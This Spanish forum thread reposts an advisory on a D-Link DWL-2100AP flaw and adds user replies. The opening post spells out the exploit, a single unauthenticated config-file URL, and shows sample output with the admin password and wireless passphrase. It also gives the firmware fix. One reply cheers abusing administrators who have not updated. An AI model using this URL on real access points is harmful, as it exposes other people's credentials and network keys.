Calificación:
  • 0 voto(s) - 0 Media
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
Etiquetas
2100 ap dlink vulnerabilidad dwl

Vulnerabilidad: Dlink DWL-2100-AP
#1
Marca: Dlink
Modelo: DWL-2100AP
Categoria: Punto de Acceso
Firmware afectado: 2.10 y versiones anteriores !!
Tipo agujero: Fichero de configuracion accesible ( .cfg )
Informacion: en texto plano

Noticia original de http://wardrive.es

[Imagen: shivmain.gif]
Advisory: neophasis

[Imagen: logo.gif]
Vulnerabilidad descubierta por: INTRUDERS TIGER TEAM SECURITY


Explotación

La vulnerabilidad nos permitira acceder a la siguiente información:

Usuario y contraseña del AP

Contraseña WEP o WPA

SSID, IP, mascara de subred, Direcciones MAC filtradas, etc


Al introducir en el navegador....

Código:
http://direccion IP del AP/cgi-bin/Intruders.cfg


obtendremos algo parecido a esto:

Cita:CopyrightíƒÆ’í†â€™íƒÂ¢í¢â€šÂ¬í…¡© 2002 Atheros Communications, Inc., All Rights Reserved
DO NOT EDITí­Â¢íƒÆ’í‚¢íƒÂ¢í¢â€šÂ¬í…¡íƒâ€ší‚¬íƒÆ’í‚¢íƒÂ¢í¢â‚¬Å¡í‚¬íƒâ€ší‚This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
Several lines removed.


.... y mas datos Tongue

Protección

Para invulnerabilizar un D-Link 2100 AP deberemos actualizar a la versión 2.20 del firmware disponible en la web oficial de D-link Iberia..

Descargar


Sinceramente me he quedado boquiabierto!.. Big Grin lo he probado y funciona!... te da mas datos de los que te puedas imaginar... y de la manera mas tonta...

Por esta razon los de Dlink han corrido este mes de junio en sacar un nuevo Firmware Big Grin ahora lo entiendo!.... jajajaja


[Imagen: media-player-logo.gif]

Y encima un Video... por si no habeis tenido bastante... demostrando el Hack!...

http://milw0rm.com/video/watch.php?id=31
Zero13

"Así como el hierro se oxida por falta de uso, también la inactividad destruye el intelecto.." - Leonardo Da Vinci

Síguenos en TwitterYoutube

Responder
#2
Vaya bug :-o

Y mucho me temo que si mas de la mitad de la gente no se preocupa de asegurar su red wifi, de lo otro que queda la mayoria no se va a preocupar de cambiar de firmware...
Responder
#3
Este es un Dlink pero no se que modelo, en este caso no vale, aunque sea por via cable es igual.


[Imagen: 04kt.jpg]
Responder
#4
Y ahora qua hacemos:

Dejamos el firm con el superbug y que nos deja usar 250 mW o...

Ponemos el nuevo, tapamos el bug y PERDEMOS la potencia de emisión...

Qua recomiendas? Hay forma de impedir el acceso al AP desde http??
Responder
#5
Por ahora...toca esperar a encontrar un firmware que permita dicha Hack, ya que el nuevo si permite conexion por telnet, pero.... no tiene el mandato clave Big Grin

He estado mirando por si este AP tiene filtro de acceso por MAC ó IP para acceder a la gestion de la configuracion del puerto 80... pero va a ser que no! Big Grin

Si alguien descubre algo al respecto ó encuentra el firmware tan deseado... que lo diga Wink
Zero13

"Así como el hierro se oxida por falta de uso, también la inactividad destruye el intelecto.." - Leonardo Da Vinci

Síguenos en TwitterYoutube

Responder
#6
he visto que los AP son toralmente transparentes, son com un switch, se manejan en base a direcciones MAC, oscea podrian configurar el AP con las IP 10.10.10.1 con mascara 255.0.0.0, y los equipos que se conecten a el pueden ponerle la IP 192.168.1.x con mascara 255.255.255.0, y podran conectarse, pertenecer al segmento de red del AP solo les servira para gestionar el AP, quiza si ustedes se inventan una IP que sea dificil de adivinar puedan evitar eso saludos desde aca..
Responder
#7
Novedades... un video demostrando el Hack!...

[Imagen: media-player-logo.gif]

http://milw0rm.com/video/watch.php?id=31
Zero13

"Así como el hierro se oxida por falta de uso, también la inactividad destruye el intelecto.." - Leonardo Da Vinci

Síguenos en TwitterYoutube

Responder
#8
wow!!! JAJAJA, que vulnerabilidad esta!!! da toda la info!! pero no se si a mi 2100 se le pueda meter el 2.20.. porque ya proba unos similares y no me funcionan Sad. gracias por el aviso!!
Responder
#9
Gracias por la info Zero13 muy buena, pero habran alguno administradores q no lo actualizan y se puede aprovechar esa info al maximo :diablo2: chevereeee..!!!!
Responder
#10
bueno en mi AP D´Link he probado esto: http://direccion IP del AP/cgi-bin/Intruders.cfg y no funciona, el aP es H/W A4 y F/W 2.40na. asi q tranquilos. saludos.
Responder


Posibles temas similares...
Tema Autor Respuestas Vistas Último mensaje
  Hack DLink DWL 2100 AP --> TX 250 mw ( 25 dBm ) Zero13 135 112,915 25-11-2013, 17:16
Último mensaje: ChristianSeuba
  problemas de conexion Dlink DWL-2100AP lopezleonel 13 4,102 04-10-2010, 01:53
Último mensaje: tecnico203
  Ayuda conexion de modem zyxel y dlink 2100ap como cliente y luego ap. ramiro100 2 1,856 03-10-2010, 17:35
Último mensaje: lopezleonel
  Gran problema con APs 2100 jghsistemas 0 748 06-08-2010, 21:18
Último mensaje: jghsistemas
  Acces Point 8200 Dlink eduardolinares 3 2,920 13-04-2010, 13:35
Último mensaje: Zero13
  wds con dlink 3200ap Inti 1 1,666 19-10-2008, 00:43
Último mensaje: hot314666
  Hack!: Dlink DWL-900-AP - Subida Potencia ( PwR ) Zero13 5 13,770 05-08-2008, 03:05
Último mensaje: Zero13
  Funciona el AP DWL 2100 AP como cliente o repetidora?? zkorpiuz 4 3,339 13-05-2008, 23:06
Último mensaje: lopezleonel
  Pierdo mi 2100 ap Fortkuis 4 1,069 02-04-2008, 11:14
Último mensaje: Fortkuis
  INTEGRAR UNA ANTENA BIQUAD EN UN DLINK 900+ nitro 7 2,599 20-03-2008, 05:12
Último mensaje: zkorpiuz

Salto de foro:


Usuarios navegando en este tema: 1 invitado(s)